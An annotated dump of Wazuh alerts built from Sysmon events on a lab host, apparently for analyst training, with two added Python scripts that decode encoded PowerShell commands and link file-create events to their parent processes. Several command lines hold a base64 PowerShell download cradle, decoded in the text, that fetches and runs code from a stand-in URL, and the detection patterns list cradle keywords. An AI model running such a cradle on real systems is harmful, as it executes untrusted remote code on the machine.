data.win.eventdata.logonId: 0x26584 Windows logon ID for that session. It matches the Logon ID in the Security log's 4624 event, which gives the logon type and source.
data.win.eventdata.terminalSessionId: 1 Windows session number; 1 is the first interactive desktop session (0 is services).
data.win.eventdata.integrityLevel: Medium Process integrity level. Medium = standard user, not elevated; a later High-integrity child would indicate elevation.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash of the image (powershell.exe), not of anything it ran. Identical on every event here, as expected for one binary; compare it with the known hash for this build to rule out a trojaned copy.
data.win.eventdata.parentProcessGuid: {94294ddc-bc66-680a-590a-000000000e00} Sysmon GUID of the parent. Its own EID 1 is not on this page; pull it by this GUID to see what launched the chain.
data.win.eventdata.parentProcessId: 11716 Parent PID; reused after exit, so use parentProcessGuid.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Parent executable; another powershell.exe.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Parent's command line, byte-for-byte identical to the child's, encoded payload included: PowerShell re-spawning itself with the same cradle. These events do not show what causes the re-spawn; the parent's EID 1 and the content fetched from the URL would.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent runs as. Same user as the child, so no privilege change between generations.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
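The alert above carries the encoded payload but never decodes it. The script below is an added example, not code from this page, from Wazuh or from Sysmon: it pulls the -EncodedCommand argument out of the commandLine field, decodes it the way powershell.exe does (base64 of UTF-16LE text), and scores the result for download-cradle building blocks. The command line is copied from the alert; the accepted switch spellings, the indicator patterns and the verdict labels are my own assumptions.

```python
# Added example, not part of the Wazuh alert dump on this page: decode the
# -EncodedCommand payload that Sysmon EID 1 captured in
# data.win.eventdata.commandLine and score it for download-cradle indicators.
# The sample command line is copied from the alert above; the switch spellings,
# indicator patterns and verdict labels are my own assumptions.
import base64
import re

# Constructed copy of the commandLine value from the EID 1 alert above.
SAMPLE_COMMAND_LINE = (
    '"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    '"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    '-NoLogo -NoProfile -EncodedCommand '
    'SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA'
)

# powershell.exe accepts abbreviated switch names; these are the spellings of
# -EncodedCommand commonly seen on command lines (assumption: enough for triage).
_ENC_SWITCH = re.compile(
    r'(?i)(?:^|\s)[-/]e(?:ncodedcommand|ncoded|nc|c)?\s+([A-Za-z0-9+/=]{8,})'
)
_NO_PROFILE = re.compile(r'(?i)(?:^|\s)[-/]nop\w*')
_HIDDEN = re.compile(r'(?i)(?:^|\s)[-/]w(?:indowstyle)?\s+hidden')

# Cradle building blocks to look for in the decoded script text.
CRADLE_PATTERNS = {
    'invoke-expression': re.compile(r'(?i)\b(?:iex|invoke-expression)\b'),
    'web-download': re.compile(
        r'(?i)downloadstring|downloadfile|downloaddata|invoke-webrequest|'
        r'invoke-restmethod|\biwr\b|\birm\b|\bcurl\b|\bwget\b|net\.webclient|'
        r'start-bitstransfer'
    ),
    'url': re.compile(r'(?i)https?://[^\s\'"]+'),
}


def decode_encoded_command(command_line):
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None if absent or invalid."""
    m = _ENC_SWITCH.search(command_line)
    if not m:
        return None
    payload = m.group(1)
    payload += '=' * (-len(payload) % 4)  # PowerShell tolerates missing padding
    try:
        return base64.b64decode(payload, validate=True).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):
        return None


def triage_command_line(command_line):
    """Decode the payload (if any) and return the indicators found plus a verdict."""
    decoded = decode_encoded_command(command_line)
    script = decoded if decoded is not None else command_line
    hits = [name for name, rx in CRADLE_PATTERNS.items() if rx.search(script)]
    if {'invoke-expression', 'web-download'} <= set(hits):
        verdict = 'download-cradle'  # fetches remote text and executes it
    elif hits or decoded is not None:
        verdict = 'review'  # encoded or network-capable, but no execute step seen
    else:
        verdict = 'no-cradle-indicators'
    return {
        'decoded': decoded,
        'indicators': hits,
        'urls': CRADLE_PATTERNS['url'].findall(script),
        'no_profile': bool(_NO_PROFILE.search(command_line)),
        'hidden_window': bool(_HIDDEN.search(command_line)),
        'verdict': verdict,
    }


if __name__ == '__main__':
    for key, value in triage_command_line(SAMPLE_COMMAND_LINE).items():
        print(f'{key}: {value}')
```

Run as-is it prints the decoded cradle, the three indicator classes it matched and the verdict `download-cradle`. The decoder accepts unpadded base64 because PowerShell does, and it returns None rather than raising on junk after `-enc`, so it can run over every EID 1 command line in a feed without tripping on false positives such as `-ep bypass`.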
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first, then check targetFilename before acting: here the "executable" is PowerShell's own __PSScriptPolicyTest_*.ps1 policy probe, so the headline overstates the file and the real question is which process wrote it.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534206.834771 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event. Sysmon here, so read eventID against the Sysmon event table, not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Provider GUID; Sysmon's fixed GUID, the same on every host and version.
data.win.system.eventID: 11 Sysmon event ID, not a Security log ID: 11 = FileCreate.
data.win.system.version: 2 Version of this event's field layout. It changes when a Sysmon release adds fields, so parsers should key on eventID plus version.
data.win.system.level: 4 Event level; 4 = Informational. Sysmon logs its telemetry at level 4, so severity comes from the Wazuh rule, not from here.
data.win.system.task: 11 Task category. For Sysmon events it mirrors the event ID (11 = File created).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:34:19.6850661Z When the event was written to the log (UTC). Sysmon observed the file creation about 37 ms earlier (eventdata.utcTime 22:34:19.648); build timelines from utcTime.
data.win.system.eventRecordID: 281056 Incremental log record number – handy for timeline order. Immediately follows record 281055, the EID 1 for the process that wrote this file.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the event, not of the process being reported (that is eventdata.processId, 12136). Never pivot on it.
data.win.system.threadID: 4740 Thread of the Sysmon service that wrote the event. Same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in. Filter on it to separate Sysmon from Security and System.
data.win.system.computer: Attacker Hostname recorded by the event log. Should equal agent.name; a mismatch means forwarded events or a renamed host.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:34:19.648
ProcessGuid: {94294ddc-bc6a-680a-5b0a-000000000e00}
ProcessId: 12136
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4o4hfpih.vzn.ps1
CreationUtcTime: 2025-04-24 22:34:19.648
User: Attacker\Attcker1" Sysmon's rendered message text. The same fields are parsed into data.win.eventdata below; search on those, not on this free text.
data.win.eventdata.utcTime: 2025-04-24 22:34:19.648 When Sysmon observed the file creation (UTC, ms). About 1.5 s after the creating process started (22:34:18.124 in record 281055), which is the normal startup timing for this probe.
data.win.eventdata.processGuid: {94294ddc-bc6a-680a-5b0a-000000000e00} Sysmon's process GUID of the creator. It is the GUID of the EID 1 in record 281055 above: this file was written by the PowerShell running the encoded download cradle, which is what makes this otherwise routine file create worth keeping.
data.win.eventdata.processId: 12136 Windows PID of the creating process. PIDs are reused after exit; join on processGuid instead.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable that created the file.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4o4hfpih.vzn.ps1 File that was created. __PSScriptPolicyTest_<random>.ps1 in %TEMP% is written by powershell.exe itself at startup to test whether AppLocker/WDAC script enforcement applies; on its own it is benign noise that trips any "script dropped in Temp" rule. The signal is the creating process, not the file.
data.win.eventdata.creationUtcTime: 2025-04-24 22:34:19.648 File system creation time. Equal to utcTime for a brand-new file, as here; earlier when an existing file was overwritten.
data.win.eventdata.user: Attacker\\Attcker1 Account the creating process runs as (HOST\user). "Attcker1" is the account's actual spelling on this host; search for it as written.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534207.837539 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event. Sysmon here, so read eventID against the Sysmon event table, not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Provider GUID; Sysmon's fixed GUID, the same on every host and version.
data.win.system.eventID: 1 Sysmon event ID, not a Security log ID: 1 = ProcessCreate.
data.win.system.version: 5 Version of this event's field layout; parsers should key on eventID plus version.
data.win.system.level: 4 Event level; 4 = Informational. Sysmon logs its telemetry at level 4, so severity comes from the Wazuh rule, not from here.
data.win.system.task: 1 Task category. For Sysmon events it mirrors the event ID (1 = Process Create).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:34:42.0199627Z When the event was written to the log (UTC). Sysmon observed the process start 1.5 s earlier (eventdata.utcTime 22:34:40.473); use utcTime for ordering.
data.win.system.eventRecordID: 281347 Incremental log record number – handy for timeline order. Roughly 290 records after 281056, so other Sysmon events from this host sit between the two alerts.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the event, not of the process being reported (that is eventdata.processId, 12900). Never pivot on it.
data.win.system.threadID: 4740 Thread of the Sysmon service that wrote the event. Same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in. Filter on it to separate Sysmon from Security and System.
data.win.system.computer: Attacker Hostname recorded by the event log. Should equal agent.name; a mismatch means forwarded events or a renamed host.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:34:40.473
ProcessGuid: {94294ddc-bc80-680a-710a-000000000e00}
ProcessId: 12900
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc7e-680a-6f0a-000000000e00}
ParentProcessId: 2488
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Sysmon's rendered message text. The same fields are parsed into data.win.eventdata below; search on those, not on this free text.
data.win.eventdata.utcTime: 2025-04-24 22:34:40.473 When Sysmon observed the process start (UTC, ms). Use this for timelines.
data.win.eventdata.processGuid: {94294ddc-bc80-680a-710a-000000000e00} Sysmon's process GUID for the new process, unique even across PID reuse and reboots. Record 281372 below shows this same GUID as parentProcessGuid: this instance went on to spawn yet another identical PowerShell.
data.win.eventdata.processId: 12900 Windows PID; reused after exit, so join on processGuid.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the started executable.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version resource of the image; 10.0.26100 is the Windows 11 24H2 / Server 2025 build line.
data.win.eventdata.description: Windows PowerShell Version-resource description of the image.
data.win.eventdata.product: Microsoft® Windows® Operating System Version-resource product name.
data.win.eventdata.company: Microsoft Corporation Version-resource company name. Trivially forged in a rebuilt binary; trust the hash, not this.
data.win.eventdata.originalFileName: PowerShell.EXE Name compiled into the binary. Matches image here, as expected; a differently named image carrying this value is a renamed copy.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line, the same cradle as in record 281055: the base64 is UTF-16LE script text that decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'). -NoProfile skips profile scripts and the second quoted powershell.exe path is passed as the first argument.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process; the user's profile root.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as (HOST\user).
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Sysmon's identifier for the logon session. Same value as in every other event on this page: one session.
data.win.eventdata.logonId: 0x26584 Windows logon ID for that session; matches the Logon ID in the Security log's 4624 event, which gives logon type and source.
data.win.eventdata.terminalSessionId: 1 Windows session number; 1 is the first interactive desktop session (0 is services).
data.win.eventdata.integrityLevel: Medium Process integrity level. Medium = standard user, not elevated.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash of the image (powershell.exe), not of anything it ran. Identical to the earlier events, as expected for one binary.
data.win.eventdata.parentProcessGuid: {94294ddc-bc7e-680a-6f0a-000000000e00} Sysmon GUID of the parent. Its own EID 1 is not on this page; pull it by this GUID to find the start of this second chain.
data.win.eventdata.parentProcessId: 2488 Parent PID; reused after exit, so use parentProcessGuid.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Parent executable; another powershell.exe.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Parent's command line, identical to the child's including the encoded payload: the same self-re-spawning cradle seen in record 281055. The cause of the re-spawn is not visible in these events.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent runs as. Same user as the child, so no privilege change between generations.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
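The two rules on this page fire independently, but the fact that makes the EID 11 alert actionable is that its processGuid equals the processGuid of the encoded-command EID 1, and the EID 1 events chain into each other through parentProcessGuid. The script below is an added example, not code from this page, from Wazuh or from Sysmon: it joins each file create to the process that wrote it, walks the parent chain upward, and suppresses PowerShell's policy-probe file unless its creator ran an encoded command. The events are constructed copies of the fields shown above plus one made-up benign pair (record IDs 900001 and 900002); the verdict rules are my own assumptions.

```python
# Added example, not part of the Wazuh alert dump on this page: tie a Sysmon
# EID 11 file create back to the process that made it (join on processGuid),
# walk the parent chain through parentProcessGuid, and decide whether an
# "executable dropped in Temp" alert is PowerShell's own policy probe or worth
# escalating. The events are constructed copies of the fields this page shows
# plus one made-up benign pair (record IDs 900001/900002); the verdict rules
# are my own assumptions.
import re

PS_CREATE, FILE_CREATE = 1, 11

# powershell.exe writes __PSScriptPolicyTest_<random>.ps1 to %TEMP% at startup
# to find out whether AppLocker/WDAC script enforcement applies to it.
_POLICY_PROBE = re.compile(r'(?i)\\Temp\\__PSScriptPolicyTest_[^\\]+\.ps1$')
# Any common spelling of -EncodedCommand followed by a base64 blob.
_ENCODED = re.compile(r'(?i)(?:^|\s)[-/]e(?:ncodedcommand|ncoded|nc|c)?\s+[A-Za-z0-9+/=]{8,}')

PS = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
# The cradle command line from the EID 1 alerts above (constructed copy).
CRADLE = (
    '"%s" "%s" -NoLogo -NoProfile -EncodedCommand '
    'SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA'
) % (PS, PS)

SAMPLE_EVENTS = [
    # Record 281055 above: encoded-command PowerShell, parent not on the page.
    {'eventRecordID': 281055, 'eventID': PS_CREATE,
     'processGuid': '{94294ddc-bc6a-680a-5b0a-000000000e00}',
     'parentProcessGuid': '{94294ddc-bc66-680a-590a-000000000e00}',
     'image': PS, 'commandLine': CRADLE},
    # Record 281056 above: policy probe written by that process.
    {'eventRecordID': 281056, 'eventID': FILE_CREATE,
     'processGuid': '{94294ddc-bc6a-680a-5b0a-000000000e00}', 'image': PS,
     'targetFilename': 'C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4o4hfpih.vzn.ps1'},
    # Records 281347 and 281372 above: a second chain, two generations deep.
    {'eventRecordID': 281347, 'eventID': PS_CREATE,
     'processGuid': '{94294ddc-bc80-680a-710a-000000000e00}',
     'parentProcessGuid': '{94294ddc-bc7e-680a-6f0a-000000000e00}',
     'image': PS, 'commandLine': CRADLE},
    {'eventRecordID': 281372, 'eventID': PS_CREATE,
     'processGuid': '{94294ddc-bc82-680a-730a-000000000e00}',
     'parentProcessGuid': '{94294ddc-bc80-680a-710a-000000000e00}',
     'image': PS, 'commandLine': CRADLE},
    # Made-up benign pair: an ordinary PowerShell writing its own probe.
    {'eventRecordID': 900001, 'eventID': PS_CREATE,
     'processGuid': '{00000000-0000-0000-0000-000000000001}',
     'parentProcessGuid': '{00000000-0000-0000-0000-000000000002}',
     'image': PS, 'commandLine': '"%s" -NoProfile' % PS},
    {'eventRecordID': 900002, 'eventID': FILE_CREATE,
     'processGuid': '{00000000-0000-0000-0000-000000000001}', 'image': PS,
     'targetFilename': 'C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_abcd1234.xyz.ps1'},
]


def build_index(events):
    """Map processGuid -> EID 1 event, so file creates and parents can be resolved."""
    return {e['processGuid']: e for e in events if e['eventID'] == PS_CREATE}


def ancestry(guid, index, limit=32):
    """GUIDs from `guid` upward. The last entry is the first ancestor whose EID 1
    is not in hand (pull that one next) or the end of the known chain."""
    chain = []
    while guid and len(chain) < limit:
        chain.append(guid)
        ev = index.get(guid)
        if ev is None:
            break
        guid = ev.get('parentProcessGuid')
    return chain


def is_policy_probe(target_filename):
    """True for PowerShell's AppLocker/WDAC startup probe file."""
    return bool(_POLICY_PROBE.search(target_filename))


def triage_file_create(event, index):
    """Return (verdict, reason) for one EID 11 event, judged by its creator."""
    creator = index.get(event['processGuid'])
    probe = is_policy_probe(event['targetFilename'])
    if creator is None:
        return 'review', 'creator has no EID 1 in hand; pull it by processGuid'
    if _ENCODED.search(creator.get('commandLine', '')):
        chain = ' <- '.join(ancestry(event['processGuid'], index))
        what = 'policy probe' if probe else 'file'
        return 'escalate', f'{what} written by PowerShell running an encoded command; chain {chain}'
    if probe:
        return 'suppress', 'PowerShell policy probe from a process with no encoded command'
    return 'review', 'Temp write from a process without known-bad indicators'


def triage_all(events):
    """Verdict per EID 11 record ID."""
    index = build_index(events)
    return {e['eventRecordID']: triage_file_create(e, index)[0]
            for e in events if e['eventID'] == FILE_CREATE}


if __name__ == '__main__':
    index = build_index(SAMPLE_EVENTS)
    for e in SAMPLE_EVENTS:
        if e['eventID'] == FILE_CREATE:
            print(e['eventRecordID'], *triage_file_create(e, index))
    print(ancestry('{94294ddc-bc82-680a-730a-000000000e00}', index))
```

The page's file create (281056) escalates because its creator ran the cradle, while the constructed benign probe (900002) is suppressed. The ancestry walk for the last process on the page ends at {94294ddc-bc7e-...}, whose EID 1 is not on the page: that GUID is the next thing to pull from the Sysmon channel.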
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534207.845605 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event. Sysmon here, so read eventID against the Sysmon event table, not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Provider GUID; Sysmon's fixed GUID, the same on every host and version.
data.win.system.eventID: 1 Sysmon event ID, not a Security log ID: 1 = ProcessCreate.
data.win.system.version: 5 Version of this event's field layout; parsers should key on eventID plus version.
data.win.system.level: 4 Event level; 4 = Informational. Sysmon logs its telemetry at level 4, so severity comes from the Wazuh rule, not from here.
data.win.system.task: 1 Task category. For Sysmon events it mirrors the event ID (1 = Process Create).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:34:43.1695516Z When the event was written to the log (UTC). Sysmon observed the process start about 0.5 s earlier (eventdata.utcTime 22:34:42.701); use utcTime for ordering.
data.win.system.eventRecordID: 281372 Incremental log record number – handy for timeline order. 25 records after 281347, the EID 1 of this process's parent.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the event, not of the process being reported (that is eventdata.processId, 14400). Never pivot on it.
data.win.system.threadID: 4740 Thread of the Sysmon service that wrote the event. Same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in. Filter on it to separate Sysmon from Security and System.
data.win.system.computer: Attacker Hostname recorded by the event log. Should equal agent.name; a mismatch means forwarded events or a renamed host.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:34:42.701
ProcessGuid: {94294ddc-bc82-680a-730a-000000000e00}
ProcessId: 14400
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc80-680a-710a-000000000e00}
ParentProcessId: 12900
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
